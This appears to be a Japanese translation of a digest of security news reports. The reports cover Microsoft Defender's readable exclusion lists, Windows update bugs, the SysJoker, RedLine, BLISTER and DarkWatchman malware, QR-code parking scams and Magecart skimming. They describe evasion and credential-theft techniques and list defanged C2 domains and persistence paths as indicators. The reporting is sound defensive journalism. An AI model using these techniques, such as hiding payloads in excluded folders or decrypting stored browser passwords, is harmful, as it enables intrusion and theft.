     スキャン除外リストはユーザによって異なるが、システム上の攻撃者にとって有用な情報である。このスキャン除外リストは、検出される恐れなしに悪意あるファイルを格納できる場所を攻撃者に与えている。
     セキュリティ研究者は、Microsoft Defenderのスキャンから除外される場所のリストが保護されておらず、あらゆるローカルユーザが、このファイルにアクセスできることを発見した。
     無頓着なパーミッションで、ローカルユーザはレジストリを検索したり、Microsoft Defenderがマルウェアもしくは危険なファイルのチェックを許されていないパスを認識することができる。


    (画像をクリックすると拡大表示されます)

     Antonio Cocomazzi(RemotePotato0脆弱性に関するレポートで有名なSentinelOneの脅威研究者)は、この情報が保護されていないと指摘し、機密として考慮されるべきものであり、“reg query”コマンドを実行すると、Microsoft Defenderがスキャンしないように命令されている全てのもの(ファイル、フォルダ、拡張子、プロセス)が明らかになると指摘している。


    (画像をクリックすると拡大表示されます)

     他のセキュリティエキスパートNathan McNultyは、この問題はWindows 10のバージョン21H1と21H2に存在するが、Windows 11には影響を与えないことを確認している。
     McNultyはまた、誰もがGroup Policy設定を格納しているエントリのあるレジストリツリーから、除外リストを入手できることも確認している。この情報は、複数のコンピュータに関して除外を提供しているときには、より機密性が高くなる。
     Microsoftスタックの保護に精通したセキュリティアーキテクトであるMcNultyは、サーバー上のMicrosoft Defenderには「特定の役割または機能がインストールされたときに有効になる自動除外」があり、これらはカスタム ロケーションをカバーしていないと警告している。
     脅威のアクターは、Microsoft Defenderの除外リストを取得するためにローカルアクセスを必要とするが、これはハードルと言うには程遠い。多くの攻撃者は既にセキュリティ侵害したた企業ネットワークに存在しており、可能な限りステルスに横方向に移動する方法を探している。
     Microsoft Defenderの除外リストを知ることによって、Windowsマシンを既にセキュリティ侵害している脅威のアクターは、検知される恐れなしに除外されているフォルダにマルウェアを格納し実行することができる。
     Bleeping Computerが実行したテストでは、除外フォルダから実行されたマルウェアは、Windowsシステムですいすいと稼働し、Microsoft Defenderからの警告を発生させなかった。
     我々がConti身代金要求型マルウェアのサンプルを使用し、これを通常のロケーションから実行すると、Microsoft Defenderは、効力を生じこのマルウェアをブロックした。
     Conti身代金要求型マルウェアを除外フォルダに配置した後、このマルウェアを実行すると、Microsoft Defenderは如何なる警告も表示せず、如何なるアクションも取らず、このマルウェアがマシンを暗号化することを許した。
     このMicrosoft Defenderの欠点は新しいものではなく、過去にPaul Boltonによって公にされている。


    (画像をクリックすると拡大表示されます)

    或る上級セキュリティコンサルタントは、彼らは、およそ8年前にこの問題に気づき、マルウェア開発者にこれを提供する利点を認識していたと発言している。

     「もしも私がマルウェア開発者だったなら、Windows Defenderの除外を検索し、間違いなく私のペイロードを除外フォルダにドロップするか、ドロップするペイロードに除外されているファイル名と同じ、もしくは拡張子と同じ名前を付けるように常に自分自身に言い聞かせる - Aura」

     この長きに渡り、Microsoftがこの問題を未だに解決していないので、ネットワーク管理者は、グループポリシーを介してサーバーローカルマシンでMicrosoft Defenderの除外を適切に構成するためのドキュメントを参照する必要がある。


    Windowsの新しいKB5009543, KB5009566アップデートはL2TP VPN接続を破壊する
    BleepingComputer : News>Security(2022/01/12)
     Windows 10のユーザと管理者が、最近のWinodows 10用のKB5009543とWindows 11用のKB5009566累積アップデートをインストールした後に、L2TP VPN(【訳注】「L2TP」と「IPsec」の2つのプロトコルを併用したVPN接続方式。モバイル端末(スマートフォン、PCなど)から、インターネット経由で企業などのプライベートネットワークへ安全に通信(リモートアクセス)できる仕組み(YAMAHAより))接続に問題が発生したと報告している。
     昨日、Microsoftは、2022年1月の定例パッチの一部としてセキュリティ上の脆弱性とバグを修正するWindows Updateをリリースした。
     これらのアップデートは、Windows 11用のKB5009566と、Windows 10 2004/20H1/21H1用のKB5009543を含んでいる。

    アップデートはL2TP接続を破壊する

     昨日のアップデートをインストールした後、Windowsユーザは、Windows VPNクライアントを使用して接続しようとした時、L2TP VPNが破壊されていることを発見した。
     VPNデバイスに接続しようとした時、彼らは、以下に示す"Can't connect to VPN. The L2TP connection attempt failed because the security layer encountered a processing error during initial negotiations with the remote computer(VPNに接続できません。リモートコンピュータとの最初の交渉中にセキュリティ層が処理エラーに遭遇したため、L2TP接続の試行に失敗しました(和訳はソフトアンテナより引用) )"というエラーメッセージを表示された。


    L2TP VPN接続時のWindowsエラー(画像をクリックすると拡大表示されます)

     このイベントログは、エラーコード789(VPN接続に失敗した)と述べるエントリをログしている。


    L2TP VPN接続の失敗に関するWindowsイベントログ(画像をクリックすると拡大表示されます)

     このバグは全てのVPNデバイスに影響を与えるのではなく、接続を確立するために組み込みのWindows VPNクライアントを使用したユーザにのみ影響するようである。
     Twitter上でRonnyとして知られるセキュリティ研究者は、このバグはWindows VPNクライアント使用している人々のUbiquiti(【訳注】米国に本拠を置くテクノロジ企業)のClient-to-Site VPN接続に影響を与えているとBleepingComputerに話した。
     多くのWindows管理者もまたRedditに、このバグはSonicWall, Cisco Meraki, WatchGuard Firewallへの接続に影響を与えており、後者のクライアントもこのバグの影響を受けていると報告している。
     多くのユーザは未だリモートで作業しているので、管理者はKB5009566とKB5009543アップデートを削除せざるをえない。これで再起動すると直ちにL2TP VPN接続は修復される。
     Windowsユーザは、管理者に特権を昇格させたコマンドプロンプトで以下のコマンドを使用することでKB5009566とKB5009543を削除することができる。

    Windows 10: wusa /uninstall /kb:5009543
    Windows 11: wusa /uninstall /kb:5009566

     しかしながら、Microsoftは単一のWindows累積アップデートに全てのセキュリティアップデートを同梱しているので、このアップデートを削除すると、1月の定例アップデートでパッチした脆弱性に関する全ての修正が削除される。
     それ故、Windows管理者は、パッチが適用されていない脆弱性のリスクと、VPN接続に接続できないことによって引き起こされる混乱のリスクを比較検討する必要がある。
     どれがこのバグを引き起こしているのかは明らかではないが、Microsoftの1月の定例パッチはWindows Internet Key Exchange (IKE)プロトコル中の多くの脆弱性(CVE-2022-21843, CVE-2022-21890, CVE-2022-21883, CVE-2022-21889, CVE-2022-21848, CVE-2022-21849)を修正している。また、この問題を発生させる可能性があるWindows Remote Access Connection Manager中の脆弱性(CVE-2022-21914CVE-2022-21885) を修正している。
     残念ながら、現時点でL2TP VPN接続の修正もしくは解決策は分かっていない。
     BleepingComputerは、このバグに関してMicrosoftに尋ねたが、未だに返答はない。


    新しいSysJokerバックドアはWindows, macOS, Linuxをターゲットにしている
    BleepingComputer : News>Security(2022/01/11)
     'SysJoker'と名付けられた新しいマルチプラットフォーム バックドアが、オンライン上に出現した。このバックドアはWindows, Linux, macOSをターゲットにしており、三つのオペレーティングシステム全てで検出を回避する能力を持っている。
     この新しいマルウェアの発見は、LinuxベースのWebサーバへの攻撃を調査していた2021年12月、この行動の兆候を最初に発見したIntezerの研究者からである。
     VirusTotalへのこのマルウェアサンプルの最初のアップロードは、2021年下半期に発生している。これはまた、C2ドメイン登録時間と一致している
     このセキュリティ アナリストは、SysJokerに関する詳細な技術情報を公開している。研究者達は、公開前にBleepingComputerとこの情報を共有していた。

    Jokerは注目を集めるのが嫌い

     このマルウェアはC++で書かれており、各変種はターゲットのオペレーティングシステム用に適合されているが、それら全てがVirusTotal(57の異なるアンチウィルス検出エンジンを使用するオンライン スキャンサイト)で未検出である。  Windowsで、SysJokerは第一段階でDLLの形式でドロッパーを使用する。これは、以下に示すことを実行するためにPowerShellコマンドを使用する。

      ・ GitHubレポジトリからSysJoker ZIPを掴む
      ・ "C:\ProgramData\RecoverySystem\”に、これを解凍する
      ・ このペイロードを実行する
     次に、このマルウェアは最大2分間ほど活動しない。その後、新しいディレクトリを作成し、Intel Graphics Common User Interface Service ("igfxCUIService.exe”)としてそれ自身をコピーする。


    Windows上でのSysJokerの全実行プロセス(画像をクリックすると拡大表示されます)

     「次に、SysJokerはLiving off the Land (LOtL、【訳注】自給自足/環境寄生と訳され、マルウェアが既存のリソースを利用して溶け込み、AV やサンドボックスの解析による検出を回避するための手法(Deep Instinctより))コマンドを使用してマシンに関する情報を収集する。SysJokerは、このコマンドの結果をログするために様々な一時テキストファイルを使用している」と、「これらのテキストファイルは即座に削除され、JSONオブジェクトに格納される。次にエンコードされ、"microsoft_Windows.dll”と名付けられたファイルに書き込まれる」とIntezerのレポートは説明している。
     システムとネットワークデータを収集した後、このマルウェアは、新しいレジストリキー(HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)を追加することで永続性を作成する。全ての機能がこの段階に到達する間は、ランダムな活動しない時間が挿入される。
     このマルウェアの次のステップは、そのアクターが制御しているC2サーバと心を通わせることである。これはハードコードされたGoogle Driveリンクを使用している。


    ハードコードされたGoogle Driveリンクの解明(画像をクリックすると拡大表示されます)

     このリンクは、アクターが利用可能なサーバをライブビーコンに提供するために恒常的にアップデートしている"domain.txt”ファイルをホストしている。このリストは検出とブロックを回避するために、しょっちゅう変更されている。
     感染の初期段階で収集されたシステム情報は、最初のハンドシェイク(【訳注】通信する前に制御情報を交換すること)としてC2に送信される。このC2は感染した末端の同定子として一意のトークンで応答する。
     そこから、このC2は、追加のマルウェアをインストールしたり、感染したデバイス上でコマンドを実行したり、あるいは、バックドアがそれ自体をこのデバイスから削除するようにこのバックドアに命令する。けれども、この最後の二つの指示は未だ実装されていない。


    SysJoker C2通信ダイアグラム(画像をクリックすると拡大表示されます)

     LinuxとmacOS用の変種は初期段階でDLL形式のドロッパーを持っていないが、最終的には感染したデバイス上で同じ悪意ある挙動を実行する。

    検出と防御

     Intezerは、彼らのレポート中にあらゆるIndicators Of Compromise(IOCs、【訳注】侵害の痕跡 (IOC) により、差し迫った攻撃、ネットワーク侵害、マルウェア感染を把握できる(Intsightsより))を提供しているので、管理者は感染したデバイスにSysJokerの存在を検出するために使用することができる。
     以下に、各オペレーティングシステムに関するIOCの一部を概要する。

     Windows、このマルウェアのファイルは"C:\ProgramData\RecoverySystem"フォルダの下、C:\ProgramData\SystemData\igfxCUIService.exe,とC:\ProgramData\SystemData\microsoft_Windows.dllに配置される。
     永続性のために、このマルウェアは、igfxCUIService.exeマルウェア実行ファイルを起動する"igfxCUIService"のAutorun "Rnu"値を作成する。

     Linux、このファイルとディレクトリは"/.Library/”の下に作成され、永続性は以下のcronジョブ: @reboot (/.Library/SystemServices/updateSystem)を作成することで確立される。

     macOS、このファイルは"/Library/”に作成され、永続性は、パス: /Library/LaunchAgents/com.apple.update.plistの下のLaunchAgentを介して達成される。

     Intezerレポートで公開されたC2ドメインは以下である:

      ・ https[://]bookitlab[.]tech
      ・ https[://]winaudio-tools[.]com
      ・ https[://]graphic-updater[.]com
      ・ https[://]github[.]url-mini[.]com
      ・ https[://]office360-update[.]com
      ・ https[://]drive[.]google[.]com/uc?export=download&id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn
      ・ https[://]drive[.]google[.]com/uc?export=download&id=1W64PQQxrwY3XjBnv_QaeBQu-ePr537eu

     SysJokerにセキュリティ侵害されたことを発見した場合には、以下の三つのステップに従いなさい:

      1 このマルウェアに関連する全てのプロセスをKILLしなさい。そして、手動でファイルと関連する永続性メカニズムを削除しなさい
      2 メモリ スキャナを実行し、悪意ある全てのファイルが感染したシステムから根こそぎ削除されていることを確実にしなさい
      3 潜在的なエントリポイントを調査する、ファイアーウォールの設定をチェックする、全てのソフトウェアツールを利用可能な最新バージョンにアップデートする


    Microsoft: KB5008212 Windowsセキュリティ アップデートはOutlookの検索を破壊する
    BleepingComputer : News>Security(2022/01/06)
     Microsoftは、12月の定例パッチでリリースされたWindows 10 バージョン21H2セキュリティアップデートによって発生する問題(Microsoft 365用のOutlookに検索トラブルを導く)を認識していた。
    KB5008212アップデートをインストールすると、その後のeMailは検索結果に表示されない可能性がある」と、Microsoftは最近公開したOfficeサポートドキュメントで説明している。
     Microsoftは、現在調査中であり可能な限り早急に詳細な情報とアップデートを提供すると発言している。
     この新たに知られた問題は、Windows 11にアップグレードしたシステム上で発生する別の問題と大変類似しており、同様に検索トラブルを引き起こしている。
     この新しいバグと同じではないが、これらの問題は、Windows 11 プレビュービルドをユーザがインストールし始めた2020年6月に表面化し始めた。この時は、アップグレードプロセス中にWindows検索インデックスを削除していた。
     顧客は現時点で、Windows Desktop Searchを無効にしOutlookの検索エンジンに切り替えるようにレジストリキーを設定することで、Outlookの検索が結果を返してこない問題は修正できるとアドバイスされている。
     組み込みの検索が開始されると、Outlookは、"search performance will be impacted because a group policy has turned off the Windows Search service."を表示し、パフォーマンスに影響がでると警告してくる。

    Outlookの検索が機能しない問題に関する一時的な解決策

     MicrosoftはWindows 10 KB5008212セキュリティアップデートによって発生した検索トラブルの修正が利用可能になるまでの解決策として同じアプローチを推奨している。
     Outlook用のWindows Desktop Searchを無効にするには以下の手順に従う必要がある:

      1.ログイン後、Startボタンを右クリックし、Runを選択する。開いたダイアログボックスでregeditとタイプしOKをクリックする。これでレジストリエディタが起動する。
      2.以下に記すレジストリ中のサブキーを発見し、クリックする。
    • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
    • 3.Edit > New > Key をクリックし、この新しいキーをWindows Searchと名付ける。
      4.新しいWindows Searchキーを選択する。
      5.Edit > New > DWORD Value をクリックする。
      6.このDWORDの名前にPreventIndexingOutlookとタイプし、Enterをクリックする。
      7.PreventIndexingOutlookを右クリックし、次にModifyをクリックする。
      8.Valueデータボックスで、このレジストリ エントリを有効にするために 1 をタイプし、OKをクリックする。
      9.レジストリエディタを終了する。次にOutlookを再起動する

     Windows Desktop Searchを復活させたい場合は、0をタイプし、OKをクリックすることでPreventIndexingOutlookを無効化する必要がある。
     Microsoftはまた、以下の問題を含む他の既知のOutlook問題に関する解決策を公開している:


    米国の警察はフィッシング用QRコードの付いたパーキングメータを警告している
    Bitdefender : Industry News(2022/01/05)
     急いで車を駐車したい? パーキングメータ用の現金を探すためにポケットを探し回りたくない? あるいは、電話に正しい支払いアプリケーションをインストールしていない?
     ところで、メータの側面に貼り付けてある支払いQRコードを慌ててスキャンする前に注意深く考えよう。それは、あなたの金融情報を釣り上げるために詐欺師によって企てられたものかもしれないと。
     警察は、パーキングメータにQRコードが貼り付けられておらず、コイン、カード、スマートフォンアプリでのみ支払うことができるテキサス州オースティンで、公共のパーキングメータに貼り付けられたインチキのQRコードを発見したと警告している。


    2022/01/03 オースティン警察Twitter(画像をクリックすると拡大表示されます)

     この都市の訪問者や疑うことを知らない急いでいる人々が、考えもなしにこのインチキのQRコードを単純にスキャンしたら何が起こるのだろうか?
     オースティン警察が発見したこのQRコードは、疑うことを知らないユーザを詐欺のためのWebサイトに連れて行く、そして、希望の駐車時間の料金が支払われるという偽の契約で支払い情報の詳細を訪ねてくる。
     オースティン市役所は、サン アントニオの職員によって類似のQRコードスカムを通知された後、そのパーキングメータをチェックした。彼らは、12月下旬同様に貼られた100を超えるパーキングメータを発見した。
     サン アントニオ警察のMarcus Booth警部補は、このWebページは希望する駐車時間用の支払いを受け入れるように装っており、金銭は市の財源になるのではなくスカマーの手に落ちるとレポータに告げている。
     簡単に言えば、窃取の犠牲者は車の運転手だけでなく、市もまた犠牲者である。
     二つの市でパーキングメータに貼り付けた攻撃が関連しているのか、模倣なのかは不明である。しかし、明らかに、他のグループが他のアメリカの都市や世界の他の場所で実際に複製することが難しいスカムではない。
     結果として、パーキングメーターの代金は現金もしくは適切なスマートフォンアプリを介して支払う方が賢明であるかもしれない。
     当局は、詐欺用のパーキングメーターのQRコードにだまされた可能性があると思われる人は誰でも、警察に報告し、直ぐに支払いカードの発行者に通知するように勧めている。
     他方、バッジを付けた市職員以外の者がパーキングメーターを弄っているのを発見したなら、やるべきことをして、警察に電話しなさい。


    RedLineマルウェアはパスワードをブラウザ中に保存してはならないことを示している
    BleepingComputer : News>Security(2021/12/28)
     RedLine情報窃取マルウェアは、Chrome, Edge, Operaのような人気のWebブラウザをターゲットにしており、ブラウザ中にパスワードを格納することが悪い考えであることを証明している。
     しかしながら、AhnLab ASECからの新しいレポートは、Webブラウザの自動ログイン機能を使用する便利さが、組織と個人の両方に影響を与える重大なセキュリティ問題になりつつあると警告している。
     アナリストが提示した例では、リモートの従業員は、VPNアカウント認証情報を失い、これを窃取したRedLine Stealerのアクターが、この情報を使用して三ヶ月後にこの企業のネットワークをハッキングしていた。
     感染したコンピュータにアンチマルウェア ソリューションがインストールされている場合でも、RedLine Stealerの検出と削除に失敗している。
     このマルウェアは、ChromiumベースのWebブラウザ中に見出される「ログインデータ」をターゲットにしている。そして、このデータはユーザ名とパスワードを保存しているSQLiteデータベースである。


    データベース ファイルに格納されている認証情報(画像をクリックすると拡大表示されます)

     Chromiumベースのブラウザに使用されているようなブラウザ パスワードストアは暗号化されているが、情報窃取マルウェアは、同一のユーザとしてログインしている限りプログラムを使用してストアを復号することができる。RedLineは感染したユーザとして実行されているので、感染したユーザのブラウザ プロファイルからパスワードを抽出することができる。
     「Google ChromeはWindows組み込みのCryptProtectData関数でパスワードを暗号化する。現在、この関数はtriple-DESアルゴリズム(【訳注】共通鍵ブロック暗号であるDESを3回施す暗号アルゴリズム(Wikipediaより))を使用し、データを暗号化するためにユーザ特定のキーを作成する非常に安全な関数であるが、パスワードを暗号化したユーザと同じアカウントでログインした場合にはパスワードを復号することができる」と、「このCryptProtectData関数は、その逆を実行するCryptUnprotectDataとの双子である。想像しているように、この関数はデータを復号する。これは明らかに、格納されているパスワードを復号するために大変有用である」と、'chrome_password_grabber'プロジェクトの著者は説明している。
     ユーザがブラウザ中にこの認証情報の格納を拒否した場合でさえ、このパスワード管理システムは、特定のWebサイトが「ブラックリストに登録されている」ことを示唆するために依然としてエントリを追加する。
     この脅威のアクターは、この「ブラックリストに登録されている」アカウント用のパスワードを持っていない可能性があるが、それは、そのアカウントが存在していることを彼らに告げているので、認証情報要素や、ソーシャルエンジニアリングやフィッシング攻撃を実行することを可能にしている。


    RedLine Stealerの機能(画像をクリックすると拡大表示されます)

     盗んだ認証情報を収集した後、脅威のアクターはそれらを将来の攻撃に使用するか、あるいはダークWeb市場でそれらを販売することによって現金化しようとする。
     RedLineがハッカーに広汎に普及している例は、'2easy'ダークWeb市場の台頭である。此処で販売されていたデータの半分がこのマルウェアを使用して盗まれたものである。
     RedLine拡散の最近の他のケースは、パスワード窃取マルウェアをダウンロードしインストールさせるExcel XLLファイルを使用するWebサイト コンタクト スパムキャンペーンである。
     RedLineは今、何処にでもいるかのようである。この主たる理由は、最先端のWebブラウザが解決することを拒否している広汎に利用可能なセキュリティギャップのセキュリティ侵害に効果的なことにある。

    代わりに実行すること

     ログイン認証情報を格納するためにWebブラウザを使用することは、魅力的であり便利であるが、これを十個刷ることはマルウェア感染していなくても危険である。
     これを実行することによって、あなたのマシンにアクセスを持っているローカルもしくはリモートアクターは数分のうちにあなたの全てのパスワードを盗むことができる。
     代わりに、専用のパスワードマネージャを使用することが最善である。専用のパスワードマネージャは暗号化された金庫室にすべてのものを格納し、金庫室を解錠するにはマスターパスワードが要求される。
     更に、e-バンキング ポータルや企業資産のWebページのような重要なWebサイト用に特別なルールを設定する必要があり、手動で認証情報をインプットすることが要求される。
     最後に、これが利用可能な場合は常に多要素認証をアクティブにしなさい。この追加のステップで認証情報がセキュリティ侵害された場合でもアカウント乗っ取り事案からあなたは保護される。


    ステルス性BLISTERマルウェアはWindowsシステムに気づかれずに潜り込む
    BleepingComputer : News>Security(2021/12/23)
     セキュリティ研究者は、悪意あるコードを正当な実行ファイルのように装うために有効なコードサイニング証明書(【訳注】コンピュータプログラムを配布・販売する際に、利用者が発行元の確認や改竄検知ができるように付与されるデジタル署名の証明書(e-Wordsより))に依存する悪意あるキャンペーンを発見した。
     この研究者達がBlisterと呼んだペイロードの一つは、他のマルウェア用のローダーとして挙動し、低い検出率を楽しむ新しい脅威のようである。
     Blisterの背後にいる脅威のアクターは、彼らの攻撃を探知されないようにする複数のテクニックに依存しており、コードサイニング証明書は彼らのトリックの一つに過ぎない。

    署名、シール化、拡散

     Blisterマルウェアの背後にいる者は、検索会社Elasticの研究者達が発見した、遅くとも9月15日以降少なくとも三ヶ月間キャンペーンを実行してきている。
     この脅威のアクターは8月23日から正当なコードサイニング証明書を使用している。この証明書はロシアのプロバイダーMail.RuのeMailアドレス付きでBlist LLCと呼ばれる企業のためにデジタルアイデンティティ プロバイダSectigoによって発行されていた。

     正当な証明書をマルウェアにサインして使用することは、脅威のアクターが数年前に学習した古いトリックである。その時点に戻る。彼らは正当な企業から証明書を盗んで使用していた。今日、脅威のアクターは彼らがセキュリティ侵害した企業もしくは、隠れ蓑の企業の詳細を使用して正当な証明書を要求している。
     今週のブログへの投稿に於いて、Elasticは、証明書の悪用をSectigoに対して責任を持って通知したので、この証明書は取り消される可能性があると発言している
     この研究者達は、この脅威のアクターが複数のテクニックに依存して攻撃を検出されないようにしていると発言している。その一つの方法が、Blisterマルウェアを正当なライブラリ(例えば、colorui.dll)に埋め込むことであった。
     このマルウェアは、次にrundll32コマンドを介して特権の昇格を実行する。正当な証明書付きでサインされ管理者特権で配備されると、Blisterはセキュリティソリューションをすり抜ける。
     次のステップで、Blisterは、リソースセクションから「高度に難読化」されたブートストラッピング コードを平文化すると、Elasticの研究者達は発言している。10分間、このコードは、おそらくSandobox解析を回避するために睡眠状態のままになっている。
     次に、行動を起こし、リモートアクセスを提供するために埋め込まれているペイロードを復号し、水平方向への移動(過去、複数の脅威のアクターによって使用されたCobalt StrikeやBitRAT同様に)を可能にする。
     このマルウェアは、rundll32.exeのように装いProgramDataフォルダや他のフォルダにコピーすることで永続性を達成している。これは、スタートアップの場所に追加されるのでブートの度にexplorer.exeのチャイルドとして起動される。
     Elasticの研究者達は、Blisterローダの署名されたバージョンと未署名のバージョンを発見している。そして、共にVirusTotalスキャンニングサービスのアンチウィルスエンジンで低い検出率を誇っている。


    未署名Blisterマルウェアのサンプルの検出率(画像をクリックすると拡大表示されます)

     初期感染ベクトルのこれらの攻撃の目的は不明なままであるが、正当なコードサイニング証明書、正当なライブラリへのマルウェアの埋め込み、メモリ中でのペイロードの実行を組み合わせることによって、この脅威のアクターは攻撃の成功率を高めている。
     Elasticは、Blisterの挙動を同定するためにYara(【訳注】マルウェアの研究者たちのために作られた、マルウェアを検知・解析・分類するための、オープンソースのプログラム(SIOS SECURITY BLOGより))ルールを作成し、組織がこの脅威を防衛するための支援となる改竄の兆候を提供している。


    新しいステルス性DarkWatchmanマルウェアはWindows Registryに隠れいている
    BleepingComputer : News>Security(2021/12/19)
     'DarkWatchman'と名付けられた新しいマルウェアが、サイバー犯罪地下組織に出現した。このマルウェアは、C#キーロガーと組み合わされており軽量で高い能力を持つJavaScript RAT (Remote Access Trojan)である。
     Prevailionの研究者による技術レポートによると、この著名なRATは、主にロシアの組織をターゲットにしているロシア語で意思の疎通ができる攻撃者によって使用されている。
     DarkWatchmanの存在の最初の兆候は、脅威のアクターが悪意あるZIP添付ファイル付きのフィッシングeMailを介して、このマルウェアを拡散し始めた11月初めであった。


    DarkWatchman拡散に使用されているフィッシングeMailのサンプル(画像をクリックすると拡大表示されます)

     これらの添付されているZIPファイルには、アイコンを使用してテキストドキュメントに偽装した実行ファイルが含まれている。これらの実行ファイルは、RATとキーロガーをインストールする自己インストール型WinRARアーカイブである。


    ダウンロードされた添付ファイルのコンテンツ(画像をクリックすると拡大表示されます)

     このZIPファイルを開くと、ユーザは"Unknown Format"と記された囮のポップアップメッセージを表示される。しかし、実際にはペイロードがバックグラウンドでインストールされている。

    ステルス性「ファイルレス」RAT

     DarkWatchmanは大変軽量のマルウェアである、このJavaScript RATは32Kbのサイズであり、使用スペースは8.5Kbに過ぎないようにコンパイルされている。
     これは、"living off the land"(【訳注】マルウェアが既存のリソース(Microsoft Windowsに組み込まれた機能や信頼できるツール)を利用して溶け込み、AV やサンドボックスの解析による検出を回避するためのもの(DeepInstinctより))バイナリ、スクリプト、ライブラリの大きなセットを悪用し、モジュール間でのデータ転送のためにステルス性の手法を組み込んでいる。
     DarkWatchmanの魅力的な側面は、キーロガー用にWindows Registryファイル-レス(【訳注】ユーザに何らかの方法でソフトウェアをインストールさせて攻撃行動を実行するが、ディスクには痕跡を残さず、メモリ内だけに常駐して、攻撃を実行する手法(NECソリューションイノベータより))ストレージ メカニズムを使用していることである。
     ディスク上にキーロガーを格納する代わりに、ユーザがWindowsにログインする度にDarkWatchman RATを稼働するスケジュール タスクが作成されている。


    永続化のために追加されたスケジュール タスク(画像をクリックすると拡大表示されます)

     一旦起動すると、DarkWatchmanは、.NET CSC.exeコマンドを使用してキーロガーをコンパイルするPowerShellスクリプトを実行し、このキーロガーをメモリ中にロードする。
     「このキーロガーは、難読化されたC#ソースコードとして拡散し、Base64でエンコードされたPowerShellコマンドとして処理されレジストリに格納される。このRATが起動すると、このPowerShellスクリプトを実行し、次に、キーロガーをコンパイルし実行する」続いて「このキーロガー自体はC2(コマンドアンドコントロール サーバ)と相互通信はしないし、ディスク上への書き込みもしない。代わりに、このキーロガーがバッファとして使用しているレジストリキーにキーログを書き込む。この操作の間、このRATはログしたキーストロークをC2サーバに送信する前に、このバッファをスクレイピング(【訳注】必要なデータをWeb等から取得する行為)しクリアする」と、Prevailionの研究者Matt StaffordとSherman Smithは彼らのレポートの中で説明している。


    キーロガーをコンパイルするBase64でエンコードされたPowerShell(画像をクリックすると拡大表示されます)

     このように、レジストリはエンコードされた実行コードを隠すための場所としてだけではなく、C2に抽出した機密情報をコッソリ渡すまで、盗んだデータを保持するための一時領域でもある。
     C2コミュニケーションとインフラストラクチャに関して、DarkWatchmanのアクターは、10項目のシードリストと共にDGA(ドメイン生成アルゴリズム)を使用して、毎日最大500個のドメインを生成している。
     これにより、優れた作戦回復力が得られると同時に、通信のモニタリングと分析が非常に困難になる。
     DarkWatchmanの機能は以下である。
       ・ EXEファイルを実行します(出力が戻されるか否かに関係なく)
       ・ DLLファイルをロードする
       ・ コマンドラインでコマンドを実行する
       ・ WSHコマンドを実行する
       ・ WMIを介して多方面のコマンドを実行する
       ・ PowerShellコマンドを実行する
       ・ JavaScriptを評価する
       ・ 犠牲者のマシンからC2サーバーにファイルをアップロードする
       ・ RATとキーロガーをリモートから停止したりアンインストールする
       ・ C2サーバーアドレスまたはcall-home(【訳注】マルウェアがコンピュータや各種デバイスへの侵入に成功した後、追加的なファイルや情報などをダウンロードするためにC2サーバーに接続すること(@kkoichi1のTwitterより))タイムアウトをリモートからアップデートする
       ・ RATとキーロガーをリモートからアップデートする
       ・ 自動起動JavaScriptをRAT起動時に実行するように設定する
       ・ C2を切り替えるためのドメイン生成アルゴリズム(DGA)
       ・ ユーザーが管理者権限を持っている場合、vssadmin.exeを使用してシャドウコピーを削除する。

    この身代金要求型マルウェアの仮説

     Prevailionは、DarkWatchmanが、強力でステルスなツールで能力の低いアフィリエイトに権限を与える必要がある身代金要求型マルウェア グループによって(もしくは、身代金要求型マルウェア グループのために)テーラーメイドされた可能性があると理論付けしている。
     このマルウェアは、追加のペイロードをリモートでロードできるので、後続の身代金要求型マルウェアの配備のためのステルス性第1段階感染として使用される可能性がある。
     DarkWatchmanは、最初の足掛かりを作った後、このアクターが制御するドメインとコミュニケーションできるため、この身代金要求型マルウェアのオペレータは、ランサムウェアを接収したり配備したり、あるいは、ファイルの抽出を直接処理したりできる。
     このアプローチは、アフィリエイトの役割をネットワーク侵入者の役割にまで低下させ、同時にRaaSのオペレーションをより臨床的かつ効率的にしている。


    クレジットカード スティーラでハックされたサイトは数カ月間未検出だった
    BleepingComputer : News>Security(2021/12/15)
     脅威のアクターは顧客から盗んだ支払い情報が数カ月間未検出だったことから、この休日期間にクレジットカード スキミング攻撃を準備しているだろう。
     Megacartスキミングは、ターゲットのWebサイトに悪意あるJavaScriptコードを挿入することに関連する攻撃である。このJavaScriptは、訪問者がチェックアウトのページに存在している時に実行される。
     このコードは、クレジットカード番号、所有者名、住所、CVV(セキュリティコード)のような支払い情報の詳細を窃取する。そして、それらの情報をこのアクターに送信する。
     脅威のアクターは次に、この情報をオンラインでのグッズの購入に使用したり、地下フォーラムや"carding"サイトとして知られる暗黒Web市場で他のアクターに販売するために使用する。

    SCUFコネクション

     2021年10月、カスタムPCとコンソールコントローラのリーディング企業であるSCUF Gaming InternationalはMegacartで攻撃され、結果として32,000人の財務情報の詳細がセキュリティ侵害されていたことがAkamaiの研究者によって発見された。
     詳細な調査によって、このアナリスト達は、複数のサイトからクレジットカードの詳細を盗んだスキマーの広範なネットワークを運用している者が、SCUFに対する攻撃の責任者と同じ人物であることを発見した。
     被害を受けたサイトは以下である。
      ・ whitemountainshoes.com - 靴、履物類 (Alexa rank: 425k)
      ・ goldboutique.com - 宝石 (Alexa rank: 1.4 M)
      ・ nafnaf.com - ファッション性衣類 (Alexa rank: 85k)
      ・ schlafstaette.de - 睡眠製品
      ・ proaudiostar.com - プロ向けオーディオ機器 (Alexa rank: 150k)
      ・ truebrands.com - プロ向け飲料関連付属品 (Alexa rank: 113k)
      ・ loudmouth.com - 衣料品および特別なアパレル (Alexa rank: 1.2 M)
     Alexa rank番号が小さいほど、Webサイトが受け取るトラフィックが多いので、スキマーが未検出のまま存在する時間が長くなる、そこでMegacartのアクターが盗むクレジットカードの詳細が多くなる。
     このように、アクターは、スキマーが感染したサイト上で隠れるためにスクリプトの行動を価値のあるページに制限しているため、Akamaiの調査を困難にしている。
     「スキマーのコマンドアンドコントロール(C2)サーバーは、機密性の低いページで実行するとクリーンなコードで応答していることを発見した...」と、「...そして(スキマーは)クレジットカード情報が見つけられることのできるチェックアウトのページで実行された場合にのみ、悪意のあるコードを送信する」とAkamaiのレポートは説明している。
     Magecartのアクターが実行しているもう一つの検出防止手段は、ターゲットにしているWebサイト毎に新しいスキミング ドメインを登録していることである。
     スキミング操作が露見/発見された場合、そのドメインを非アクティブ化し他のサイトで悪意のある行動を続行している。
     この特定のケースでは、アクターは4つのWebサイトに同じC2ドメインを使用したため、小さなクラスターがほぼ同時に明らかになった。

